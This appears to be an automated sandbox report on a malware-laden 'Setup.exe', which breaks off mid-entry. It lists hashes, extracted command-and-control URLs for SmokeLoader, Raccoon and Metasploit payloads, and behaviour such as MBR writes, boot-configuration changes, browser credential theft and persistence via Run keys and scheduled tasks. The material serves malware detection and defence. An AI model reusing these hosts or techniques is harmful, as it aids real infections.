Analysis
-
max time kernel
601s -
max time network
605s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Setup.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Setup.exe
Resource
win10v20201028
General
-
Target
Setup.exe
-
Size
4.2MB
-
MD5
afd51e2ff7beac4d0c88d8f872d6d0d5
-
SHA1
185fd4793db912410de63ac7a5a3b1ac9c266b38
-
SHA256
cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19
-
SHA512
eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
http://shapkishop.store/
http://lazerprojekt.store/
http://lordliness.store/
http://185.236.231.193/
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
e71b51d358b75fe1407b56bf2284e3fac50c860f
-
url4cnc
https://telete.in/oidmrwednesday
Signatures
-
Glupteba Payload 7 IoCs
resource yara_rule behavioral3/memory/4800-161-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral3/memory/4800-162-0x0000000001390000-0x0000000001B92000-memory.dmp family_glupteba behavioral3/memory/4800-165-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral3/memory/5604-199-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral3/memory/6776-511-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/6776-512-0x0000000005080000-0x00000000058DD000-memory.dmp family_glupteba behavioral3/memory/6776-515-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/4312-103-0x0000000002830000-0x000000000285E000-memory.dmp family_redline behavioral3/memory/4312-105-0x00000000028A0000-0x00000000028CC000-memory.dmp family_redline behavioral3/memory/7044-496-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Modifies boot configuration data using bcdedit 15 IoCs
pid Process 6824 bcdedit.exe 6028 bcdedit.exe 6804 bcdedit.exe 4584 bcdedit.exe 7156 bcdedit.exe 4896 bcdedit.exe 6368 bcdedit.exe 5044 bcdedit.exe 4584 bcdedit.exe 4956 bcdedit.exe 6992 bcdedit.exe 6860 bcdedit.exe 4256 bcdedit.exe 4980 bcdedit.exe 6988 bcdedit.exe -
Nirsoft 6 IoCs
resource yara_rule behavioral3/files/0x000200000001ab8a-25.dat Nirsoft behavioral3/files/0x000200000001ab8a-26.dat Nirsoft behavioral3/files/0x000300000001ab8a-33.dat Nirsoft behavioral3/files/0x000300000001ab8a-34.dat Nirsoft behavioral3/files/0x000300000001a2df-40.dat Nirsoft behavioral3/files/0x000300000001a2df-41.dat Nirsoft -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral3/memory/1272-278-0x0000000002B00000-0x0000000002BF1000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 21 IoCs
pid Process 560 C0CA61A12E4C8B38.exe 912 C0CA61A12E4C8B38.exe 3828 1615014383700.exe 968 1615014388341.exe 1320 1615014393950.exe 3964 ThunderFW.exe 2552 MiniThunderPlatform.exe 508 23E04C4F32EF2158.exe 1124 23E04C4F32EF2158.tmp 2056 seed.sfx.exe 3564 seed.exe 4132 F2D9.exe 4312 F914.exe 4376 FABB.exe 4972 F7C.exe 5016 10A6.exe 5096 vmipgfjn.exe 3920 1CCD.exe 3872 10A6.exe 4640 jfiag3g_gg.exe 4800 2615.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral3/files/0x000100000001ab8c-4.dat office_xlm_macros -
resource yara_rule behavioral3/files/0x000500000001a9d6-148.dat upx behavioral3/files/0x000500000001a9d6-149.dat upx behavioral3/memory/3208-539-0x0000000000400000-0x0000000000897000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 13 IoCs
pid Process 4048 MsiExec.exe 560 C0CA61A12E4C8B38.exe 560 C0CA61A12E4C8B38.exe 2552 MiniThunderPlatform.exe 2552 MiniThunderPlatform.exe 2552 MiniThunderPlatform.exe 2552 MiniThunderPlatform.exe 2552 MiniThunderPlatform.exe 2552 MiniThunderPlatform.exe 2552 MiniThunderPlatform.exe 2552 MiniThunderPlatform.exe 3564 seed.exe 3872 10A6.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" 1CCD.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F7C.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 692 ipinfo.io 694 ipinfo.io 746 ipinfo.io 276 ip-api.com 417 ipinfo.io 616 ipinfo.io 533 ipinfo.io 819 ip-api.com 363 checkip.amazonaws.com 414 ipinfo.io 524 checkip.amazonaws.com -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 C0CA61A12E4C8B38.exe File opened for modification \??\PhysicalDrive0 C0CA61A12E4C8B38.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe File opened for modification \??\PhysicalDrive0 Setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1316 Setup.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 560 set thread context of 3268 560 C0CA61A12E4C8B38.exe 88 PID 560 set thread context of 3672 560 C0CA61A12E4C8B38.exe 95 PID 560 set thread context of 2036 560 C0CA61A12E4C8B38.exe 97 PID 5016 set thread context of 3872 5016 10A6.exe 147 PID 5096 set thread context of 4568 5096 vmipgfjn.exe 148 -
Drops file in Program Files directory 37 IoCs
description ioc Process File created C:\Program Files (x86)\DTS\is-T7JOM.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\DTS\is-HCF8T.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-UL04B.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-89DO3.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-QJSJP.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-0R5JN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-0MSCG.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\lang\is-2VO12.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-H4UNJ.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-RH2MR.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-O2H81.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-70C6L.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-C8P05.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-SN7LN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-L5RVO.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-NIC6U.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-L7QUG.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-7D8B8.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-9P9UN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File opened for modification C:\Program Files (x86)\DTS\DreamTrip.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-7RS5J.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-LA8IT.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-PKDGU.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-J92E3.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-3H477.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\lang\is-FSBJ1.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed seed.sfx.exe File opened for modification C:\Program Files (x86)\DTS\seed.sfx.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-3UCFD.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\images\is-H5QE5.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\DTS\is-I7NC3.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\DTS\unins000.dat 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259621546 seed.sfx.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 62 IoCs
pid pid_target Process procid_target 4320 4800 WerFault.exe 150 1444 4800 WerFault.exe 150 4636 4800 WerFault.exe 150 5112 4800 WerFault.exe 150 3548 4800 WerFault.exe 150 4664 4800 WerFault.exe 150 4672 4800 WerFault.exe 150 4396 4800 WerFault.exe 150 4976 4800 WerFault.exe 150 5052 4800 WerFault.exe 150 996 4800 WerFault.exe 150 4456 4800 WerFault.exe 150 4944 4800 WerFault.exe 150 3760 4800 WerFault.exe 150 5072 4800 WerFault.exe 150 5012 4800 WerFault.exe 150 4172 4800 WerFault.exe 150 4424 4800 WerFault.exe 150 5272 4800 WerFault.exe 150 5696 5604 WerFault.exe 192 5740 5604 WerFault.exe 192 5784 5604 WerFault.exe 192 5888 5604 WerFault.exe 192 5940 5604 WerFault.exe 192 6004 5604 WerFault.exe 192 6060 5604 WerFault.exe 192 6112 5604 WerFault.exe 192 4448 5604 WerFault.exe 192 3372 5604 WerFault.exe 192 5144 5604 WerFault.exe 192 5800 5528 WerFault.exe 212 5876 5528 WerFault.exe 212 6008 5528 WerFault.exe 212 4480 5528 WerFault.exe 212 4832 5528 WerFault.exe 212 6140 5528 WerFault.exe 212 4864 5528 WerFault.exe 212 4392 5528 WerFault.exe 212 5960 5528 WerFault.exe 212 5620 5528 WerFault.exe 212 2920 5528 WerFault.exe 212 5872 5528 WerFault.exe 212 3408 5528 WerFault.exe 212 5532 5528 WerFault.exe 212 4388 5528 WerFault.exe 212 5140 5528 WerFault.exe 212 5972 5528 WerFault.exe 212 5864 5528 WerFault.exe 212 5380 5528 WerFault.exe 212 5368 6084 WerFault.exe 264 6332 6084 WerFault.exe 264 6712 6084 WerFault.exe 264 6840 6084 WerFault.exe 264 6512 6084 WerFault.exe 264 4288 6908 WerFault.exe 304 6364 6084 WerFault.exe 264 6096 6084 WerFault.exe 264 3232 5528 WerFault.exe 212 1312 5528 WerFault.exe 212 1132 5528 WerFault.exe 212 8432 5528 WerFault.exe 212 304 4808 WerFault.exe 486 -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc C0CA61A12E4C8B38.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10A6.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10A6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10A6.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc C0CA61A12E4C8B38.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5460 schtasks.exe 692 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 6564 timeout.exe 4100 timeout.exe 1172 timeout.exe -
Kills process with taskkill 7 IoCs
pid Process 1904 taskkill.exe 5008 taskkill.exe 7124 taskkill.exe 7040 taskkill.exe 4736 taskkill.exe 6484 TASKKILL.exe 4744 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created 